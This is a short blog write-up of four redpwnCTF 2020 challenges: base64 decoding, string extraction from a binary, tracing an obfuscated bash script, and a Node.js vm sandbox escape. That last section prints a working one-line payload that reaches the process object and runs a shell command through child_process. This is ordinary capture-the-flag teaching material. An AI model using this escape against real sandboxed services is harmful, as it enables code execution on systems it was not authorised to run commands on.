top of page
This site was designed with the
.com
website builder. Create your website today.Start Now
Search
  • Writer's picturenaut
    • Jun 29, 2020
    • 2 min read

redpwnCTF 2020 Writeups

This CTF is really interesting for all. I tried and failed many times and after reviewing the writeups, I just got a

.... because of wrong direction =)). Ok fine, keep try hard next time :).


 

Base646464 [crypto]

The genereate.js as bellow --> just read content and try to base64 encode it 25 times.

const btoa = str => Buffer.from(str).toString('base64');

const fs = require("fs");
const flag = fs.readFileSync("flag.txt", "utf8").trim();

let ret = flag;
for(let i = 0; i < 25; i++) ret = btoa(ret);

fs.writeFileSync("cipher.txt", ret);

So to decode the cipher.txt --> decode the content with base64 decode 25 times.

This time, I tried cyberchef to decode this:

Solution (maximum jumps = 24 ~ a loop as 0<= i <= 24 (25 times))




CaaSino [Misc]

Description

Who needs regex for sanitization when we have VMs?!?!

The flag is at /ctf/flag.txt

nc 2020.redpwnc.tf 31273

Author: asphyxia

Given: calculator.js


This is my first time for trying to break nodejs vm module. The source code let us know that we can input any javascript code in prompt to run it in VM (nodejs module). The hint lets us known the flag is at /etc/flag.txt ==> just input the (javascript) source code to read /etc/flag.txt


Too lazy to learn nodejs at that time so I tried to search a bit :P, luckily I got a link with similar content


Read & modify a bit to get the flag content in server side:


const process = this.constructor.constructor('return this.process')();process.mainModule.require('child_process').execSync('cat /ctf/flag.txt').toString()

==> flag{vm_1snt_s4f3_4ft3r_41l_29ka5sqD}

Thanks pwnisher for the writeup!



Ropes [rev]

This chal is an easy one, the hint showed us all "It's not just a string, it's a rope!"

==> get all strings in this binary to get the flag


strings ropes
# or
cat ropes

==> get two parts of flag --> join them ---> solved: flag{r0pes_ar3_just_l0ng_str1ngs}



Uglybash [misc]


This bash script evaluates to echo dont just run it, dummy # flag{...} where the flag is in the comments.

The comment won't be visible if you just execute the script. How can you mess with bash to get the value right before it executes?

Enjoy the intro misc chal.


This chal gives us an obfuscated bash script, the description gives us a hint that flag is in the comment # flag{}

So I just tried to debug this script with bash 


bash -x cmd.sh 2> debug 1> output

Review the output content in text editor, I found too many printf be used ---> grep this


grep printf debug | awk '{print $4}' | tr -d '\n'

==> got the flag in output


'echo'dont'just'run'it,'dummy''#''flag'{'us3_zsh,_dummy'}''#

Flag: flag{us3_zsh_dummy}



384 views0 comments

Recent Posts

See All
bottom of page